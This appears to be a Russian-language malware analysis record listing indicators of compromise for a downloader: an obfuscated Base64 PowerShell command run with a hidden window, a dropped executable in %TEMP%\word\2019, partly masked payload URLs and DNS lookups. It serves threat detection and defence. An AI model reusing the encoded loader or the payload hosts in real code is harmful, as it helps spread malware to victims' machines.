Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAHcAMABwAHYAaQBkAD0AKAAoACcAWgBfAGgAegAnACsAJwBjAGMAJwApACsAJwB1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVABlAG0AcABcAFcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\ylpocpu.exe
- %TEMP%\word\2019\ylpocpu.exe
- %TEMP%\word\2019\ylpocpu.exe
- http://ra####tisitma.com/wp-includes/nl/
- http://ra####tisitma.com/cgi-sys/suspendedpage.cgi
- http://pr#####leadership.com/think/2wG/
- http://re##srl.biz/villino84/RB2/
- http://re####gmizaki.com/cgi-bin/vNf/
- http://re####gmizaki.com/cgi-sys/suspendedpage.cgi
- http://ip##sl.com/itec/E/
- http://mo###nmanna.org/isc/r/
- http://www.mo###nmanna.org/risen/
- DNS ASK ra####tisitma.com
- DNS ASK pr#####leadership.com
- DNS ASK re##srl.biz
- DNS ASK re####gmizaki.com
- DNS ASK ic####n2cibar.org
- DNS ASK ip##sl.com
- DNS ASK mo###nmanna.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAHcAMABwAHYAaQBkAD0AKAAoACcAWgBfAGgAegAnACsAJwBjAGMAJwApACsAJwB1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVABlAG0AcABcAFcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)